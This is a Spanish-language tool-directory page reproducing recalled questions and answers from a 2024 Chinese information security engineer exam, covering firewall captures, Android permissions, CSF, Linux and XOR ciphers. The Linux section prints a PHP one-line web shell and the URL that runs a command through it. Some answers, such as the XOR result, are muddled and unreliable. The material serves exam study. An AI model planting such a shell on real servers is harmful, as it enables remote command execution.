Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
2024InformationSecurityEngineer — 2024年信息安全工程师、2024InformationSecurityEngineer | Kitploit
Herramientas/GitHubGitHub/jas502n/2024informationsecurityengineer
Android SecurityEncryption/Decryption ToolsNetwork SecurityLearning & EducationCurated ResourcesLearning Paths & CoursesLabs & Practice
GitHubjas502n/2024informationsecurityengineer

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

2024InformationSecurityEngineer

2024年信息安全工程师、2024InformationSecurityEngineer

Ver Repositorio
1hace 1 añoAún no revisado

2024InformationSecurityEngineer

2024 Ingeniero de Seguridad de la Información, 2024InformationSecurityEngineer

Segundo semestre de 2024 - Ingeniero de Seguridad de la Información

Recuerdo de preguntas de ejemplo

Examen de Cualificación de Software (软考) - Fecha del examen : 2024年11月08日

一、Captura de paquetes del firewall (14 puntos)

  1. Longitud del paquete___ (2 puntos) Respuesta: 63
  2. ¿Es un dispositivo real o una máquina virtual?___ (2 puntos) Respuesta: máquina virtual
  3. IP y puerto del host de control___ (2 puntos) Respuesta: 192.168.1.218 14444
  4. Regla de filtrado de Wireshark para IP y puerto___ (2 puntos) Respuesta: ip.addr == 192.168.2.105 and tcp.dstport == 14444
  5. Comando utilizado por el host de control (2 puntos) Respuesta: ipconfig
  6. Método abreviado de Windows para ver el firewall___ (2 puntos) Respuesta: firewall.cpl
  7. ¿Qué opción?___ (2 puntos) Respuesta: Personalizada

二、Preguntas de Android (16 puntos)

  1. Directorio/archivo donde se almacena la firma___ (2 puntos) Respuesta: META-INF

  2. Directorio/archivo donde se almacenan los permisos___ (2 puntos) Respuesta: AndroidManifest.xml

  3. Pregunta 5 (10 puntos) (1) ¿Qué configuración admite la copia de seguridad? (2) Puede leer el historial de ubicaciones, ¿existe algún riesgo de seguridad? (3) En el archivo de configuración, ¿cuáles de los cuatro componentes principales se utilizan? (4) ¿Qué componente tiene el mayor riesgo de fuga de información? (5) ¿Existe un uso indebido de la información? Explíquelo en detalle.

    Respuesta: (1) backup...... No admite copia de seguridad (2) Existe un riesgo; la información desconocida corre riesgo de filtración (3) Activity, BroadcastRecevier (4) Contentprovider (5) Existe un uso indebido de la información: permisos de ubicación, cámara, almacenamiento, contactos, multimedia, Bluetooth, etc. Muchos de ellos son recopilados de forma excesiva

  4. ¿Tiene el usuario de Android permisos root? (2 puntos) Respuesta: No

三、CSF (11 puntos)

  1. ¿Qué modelo de seguridad?___ (2 puntos) Respuesta: PDRR
  2. Desconocido
  3. ¿A qué función principal corresponde el firewall?___ (2 puntos) Respuesta: Protección
  4. Pregunta 2 (4 puntos) (1) ¿Qué función principal tiene CSF de más que PDRR?___ (2 puntos) Respuesta: Identificación (2) ¿A qué función de CSF pertenece la evaluación de riesgos?___ (2 puntos) Respuesta: Identificación
  5. Además de la identificación de activos, ¿qué otras tres identificaciones existen?___ (3 puntos) Respuesta: identificación de riesgos; identificación de vulnerabilidades; identificación de medidas de seguridad existentes

四、Linux (13 puntos)

  1. Nombre completo de ll___ (2 puntos) Respuesta: ls -l

  2. ¿Actualmente es root o un usuario normal?___ (2 puntos) Respuesta: root

  3. Expresión numérica de los permisos de archivo___ (2 puntos) Respuesta: rw-r--r-- 644

  4. ¿Qué significa ../ en la figura?___ (2 puntos) Respuesta: directorio superior, /var/www/html

  5. Comandos integrados de Linux para calcular valores hash___ (2 puntos) md5sum; sha1sum; shasum -a 256

  6. shell.php <?php @eval($_GET["cmd"]); ?> (5 puntos)

  1. ¿Cuál es la contraseña de conexión correspondiente a este archivo? Respuesta: cmd
  2. ¿Qué método de solicitud HTTP se utiliza? Respuesta: GET
  3. Suponiendo que el dominio es abc.com, escriba la URL de solicitud completa para ejecutar whoami. Respuesta: abc.com/shell.php?cmd=system("whoami")

五、Cifrado (15 puntos)

  1. Además del cifrado simétrico y asimétrico, según el modo de procesamiento del texto plano, ¿de qué otra manera se puede cifrar? (2 puntos) Respuesta: cifrado por bloques y cifrado de flujo
  2. Representación en 8 bits de a (2 puntos) Respuesta: 97 ---》 01100001
  3. Resultado del cifrado XOR de a con abc (6 puntos) Respuesta: 032 o 00000000 00000011 00000010
  4. Dados mi, ki, ci, ¿cuál es la fórmula para obtener el texto plano? (2 puntos) Respuesta: mi = ki XOR ^ ci
  5. ¿Es seguro cifrar dos textos planos diferentes con la misma clave de cifrado de flujo? ¿Por qué? (2 puntos) Respuesta: No es seguro; se puede deducir un texto plano a partir del otro
  6. ¿Se puede utilizar el cifrado por bloques como cifrado de flujo? (1 punto) Respuesta: Sí
Descargar herramienta